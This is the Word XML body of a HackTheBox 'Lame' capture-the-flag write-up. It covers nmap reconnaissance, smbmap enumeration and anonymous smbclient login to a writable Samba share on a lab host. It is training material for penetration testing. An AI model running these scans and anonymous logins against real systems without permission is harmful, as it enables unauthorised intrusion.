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A511" w14:textId="3BE96D52" w:rsidR="005F77AE" w:rsidRDefault="008B45C8">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackTHeBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>- Lame by Keenan Williams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0513B391" w14:textId="5FDC6DCF" w:rsidR="008B45C8" w:rsidRDefault="008B45C8"/>
    <w:p w14:paraId="1BE06565" w14:textId="31446EB3" w:rsidR="008B45C8" w:rsidRP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</w:pPr>
      <w:r w:rsidRPr="008B45C8"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 xml:space="preserve">I start with a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B45C8"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>NMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="008B45C8"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 xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r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>I  used</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r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 xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-BoldOblique" w:hAnsi="BitstreamVeraSans-BoldOblique" w:cs="BitstreamVeraSans-BoldOblique"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> because my initial scan did not go through so I  had to get an aggressive scan going.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9EA29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# Nmap 7.91 </w:t>
      </w:r>
      <w:proofErr w:type="gram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scan initiated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Sat Oct 30 16:42:48 2021 as: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nmap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-A -T5 -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sC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sV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Pn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oN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intialscan.txt 10.10.10.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D05EF7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Nmap scan report for 10.10.10.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED7D09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Host is up (0.0092s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B21A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Not shown: 996 filtered ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6F5D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PORT STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42CBD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21/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open ftp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vsftpd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2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693E06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|_ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6214F130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ftp-syst:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58759E7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STAT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334E42B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FTP server status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C62DC8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Connected to 10.10.14.37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B3ADD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Logged in as ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2320054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TYPE: ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E77C3F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No session bandwidth limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A5E3F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Session timeout in seconds is 300</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28A4D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Control connection is plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3848F25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Data connections will be plain text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618702A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vsFTPd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2.3.4 - secure, fast, stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E6A5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|_End of status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3182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22/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open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ssh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OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8243A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ssh-hostkey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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0669E2B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1024 60:0f:</w:t>
      </w:r>
      <w:proofErr w:type="gram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cf:e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1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A5A4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 2048 56:56:24:0</w:t>
      </w:r>
      <w:proofErr w:type="gram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f:21:1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d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED6DFB7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139/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open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netbios-ssn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Samba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3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34513B9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445/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open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netbios-ssn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Samba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3.0.20-Debian (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B68982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Service Info: OSs: Unix, Linux; CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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cpe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o:linux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:linux_kernel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66A0F64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Host script results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4814651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|_clock-skew: mean: 2h00m10s, deviation: 2h49m45s, median: 8s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177341E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os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-discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65173A0A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OS: Unix (Samba 3.0.20-Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A74F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Computer name: lame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D06E234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NetBIOS computer name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20CBF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Domain name: hackthebox.gr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EA6B7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 FQDN: lame.hackthebox.gr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8E936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 System time: 2021-10-30T16:43:16-04:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA610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-security-mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5428949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account_used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 &lt;blank&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D86EC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authentication_level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 user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E4B3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challenge_response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 supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52385A0A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|_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message_signing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 disabled (dangerous, but default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E32266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|_smb2-time: Protocol negotiation failed (SMB2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB8B0E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Service detection performed. Please report any incorrect results at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">https://nmap.org/submit/ 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>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="266D7784" w14:textId="6A02766B" w:rsidR="008B45C8" w:rsidRDefault="008B45C8" w:rsidP="008B45C8">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Nmap done at Sat Oct 30 16:43:43 2021 -- 1 IP address (1 host up) scanned in 55.75 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F0497E" w14:textId="6D403260" w:rsidR="008B45C8" w:rsidRDefault="008B45C8"/>
    <w:p w14:paraId="52D97147" w14:textId="647A23B0" w:rsidR="008B45C8" w:rsidRDefault="008B45C8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I notice the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> ports are open so I chose that for my vein of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538EA9C" w14:textId="77777777" w:rsidR="008B45C8" w:rsidRP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</w:pPr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139/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tcp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open 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netbios-ssn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Samba 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smbd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3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738D116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445/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tcp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open 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netbios-ssn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Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B45C8">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.0.20-Debian (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40728A85" w14:textId="0126058B" w:rsidR="008B45C8" w:rsidRDefault="008B45C8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">I enumerate SMB a bit further with a another </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B60A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</w:p>
    <w:p w14:paraId="6C854F0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DejaVuSans" w:eastAsia="DejaVuSans" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>─</w:t>
      </w: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$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nmap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-A -T5 -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sC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sV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-p445,139 -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Pn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oN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smb.txt 10.10.10.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135692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Host discovery disabled (-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Pn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). All addresses will be marked 'up' and scan times will be slower.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090EE9A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Starting Nmap 7.91 </w:t>
      </w:r>
      <w:proofErr w:type="gram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( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://nmap.org</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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) at 2021-10-31 13:56 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C25D31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Nmap scan report for 10.10.10.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722071D2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Host is up (0.010s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BB7C46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PORT STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B745A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VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB824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139/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open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netbios-ssn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Samba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smbd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3.X - 4.X (workgroup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850BE46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WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA041E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445/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tcp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open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netbios-ssn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Samba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smbd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 3.0.20-Debian (workgroup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0DC0F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WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AFBF0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Host script results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26407BD0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|_clock-skew: mean: -5h17m15s, deviation: 2h49m43s, median: -7h17m16s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA8F3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-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os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-discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5E53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 OS: Unix (Samba 3.0.20-Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2812FB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 Computer name: lame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CD50A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 NetBIOS computer name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1435C0C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 Domain name: hackthebox.gr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D30FAC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 FQDN: lame.hackthebox.gr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1109B2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|_ System time: 2021-10-31T06:39:51-04:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ADB91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-security-mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA1C55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account_used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: &lt;blank&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1CD10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authentication_level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: user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8CEB3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challenge_response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: supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C29653D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|_ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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message_signing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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: disabled (dangerous, but default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1DCC86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|_smb2-time: Protocol negotiation failed (SMB2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BF1B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 xml:space="preserve">Service detection performed. Please report any incorrect results at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">https://nmap.org/submit/ </w:t>
      </w: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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="35CA748F" w14:textId="73B4ECCB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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 52.26 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B3327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</w:p>
    <w:p w14:paraId="424EA8E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</w:p>
    <w:p w14:paraId="09493C07" w14:textId="15DFA3DB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  <w:proofErr w:type="spellStart"/>
      <w:r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  <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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  <w:t xml:space="preserve"> enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59907B4F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DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-BoldOblique" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>─</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-BoldOblique" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(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>root kali)-[/home/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keenan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/Desktop/HTB/Lame]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D778B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BitstreamVeraSans-BoldOblique" w:cs="DejaVuSans"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-BoldOblique" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>└─</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># 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smbmap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 xml:space="preserve"> -H 10.10.10.3 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="DejaVuSans" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⨯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-BoldOblique" w:cs="DejaVuSans"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="DejaVuSans" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633E7B56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[+] IP: 10.10.10.3:445 Name: 10.10.10.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E8C4C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Disk Permissions Comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C293BB1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---- ----------- -------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E3C758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print$ NO ACCESS Printer Drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61637733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tmp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 xml:space="preserve"> READ, WRITE oh noes!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0BFA9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opt NO ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2591F5" w14:textId="77777777" w:rsidR="008B45C8" w:rsidRDefault="008B45C8" w:rsidP="008B45C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IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6884B09E" w14:textId="2E029B28" w:rsidR="008B45C8" w:rsidRDefault="008B45C8" w:rsidP="008B45C8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ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian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))</w:t>
      </w:r>
      <w:r w:rsidR="0001249D">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="118CE0AC" w14:textId="72D6DF6A" w:rsidR="0001249D" w:rsidRDefault="0001249D" w:rsidP="008B45C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3845EA48" w14:textId="6D39A0E6" w:rsidR="0001249D" w:rsidRDefault="0001249D" w:rsidP="008B45C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F840710" w14:textId="5FC53ED7" w:rsidR="0001249D" w:rsidRP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</w:pPr>
      <w:r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SMBCLIENT was having difficulty connecting. A</w:t>
      </w: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fter</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w: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 xml:space="preserve">some googling a quick solution was found since this is running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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samaba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 3.0.20 </w:t>
      </w:r>
      <w:r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I</w:t>
      </w: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 xml:space="preserve"> can use the fol</w:t>
      </w:r>
      <w:r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low</w:t>
      </w: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ing com</w:t>
      </w:r>
      <w:r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m</w:t>
      </w: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 xml:space="preserve">and for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="770FBA9D" w14:textId="77777777" w:rsidR="0001249D" w:rsidRP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</w:pPr>
      <w:proofErr w:type="spellStart"/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lastRenderedPageBreak/>
        <w:t>accesss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31771604" w14:textId="6ADCD9AB" w:rsidR="0001249D" w:rsidRP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01249D"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smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0001249D"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-N //10.10.10.3/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0001249D"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01249D">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSansMono-Roman" w:hAnsi="BitstreamVeraSansMono-Roman" w:cs="BitstreamVeraSansMono-Roman"/>
          <w:b/>
          <w:bCs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--option='client min protocol=NT1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAE96B7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BitstreamVeraSans-Roman" w:cs="DejaVuSans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A5BE56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BitstreamVeraSans-Roman" w:cs="DejaVuSans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031719E3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BitstreamVeraSans-Roman" w:cs="DejaVuSans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40947065" w14:textId="1183A9D5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DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>─</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>─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>(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root kali)-[/home/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keenan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/Desktop/HTB/Lame]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A89D79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DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>└─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#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smbclient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-N //10.10.10.3/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tmp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--option='client min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ADE91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BitstreamVeraSans-Roman" w:cs="DejaVuSans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protocol=NT1' 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="DejaVuSans" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>⚙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED347A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Anonymous login successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6FE181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Try "help" to get a list of possible commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512AC88F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: \&gt;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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="715D06B7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. D 0 Sun Oct 31 06:43:52 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D7827C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.. DR 0 Sat Oct 31 02:33:58 2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB58705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distcc_e456e36d.stdout R 0 Sat Oct 30 20:29:33 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35099898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orbit-makis DR 0 Sun Oct 31 06:25:31 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2FC786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distcc_e456e36d.stderr R 57 Sat Oct 30 20:30:29 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006446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distccd_e456e36d.o R 0 Sat Oct 30 20:29:33 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A423C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linpeas.sh AR 631750 Sat Oct 30 20:36:47 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4BE17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proofErr w:type="gram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.ICE</w:t>
      </w:r>
      <w:proofErr w:type="gram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unix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DH 0 Sat Oct 30 16:39:29 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1614B0C0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vmware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-root DR 0 Sat Oct 30 16:39:50 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD8387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.X11-unix DH 0 Sat Oct 30 16:39:54 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113B9A5A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gconfd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-makis DR 0 Sun Oct 31 06:25:31 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369D2D09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.X0-lock HR 11 Sat Oct 30 16:39:54 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D590E7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show R 0 Sat Oct 30 20:52:52 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A24D79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distccd_e456e36d.i R 10 Sat Oct 30 20:29:33 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426EB3DC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5564.jsvc_up R 0 Sat Oct 30 16:40:31 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF6E520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vgauthsvclog.txt.0 R 1600 Sat Oct 30 16:39:28 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0CD2C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7282168 blocks of size 1024. 5385828 blocks available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BF4F1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smb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: \&gt; get vgauthsvclog.txt.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE821A" w14:textId="784080DD" w:rsidR="0001249D" w:rsidRDefault="0001249D" w:rsidP="0001249D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Login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successfull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but nothing seems to be here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE68B3" w14:textId="77777777" w:rsidR="0001249D" w:rsidRDefault="0001249D" w:rsidP="008B45C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
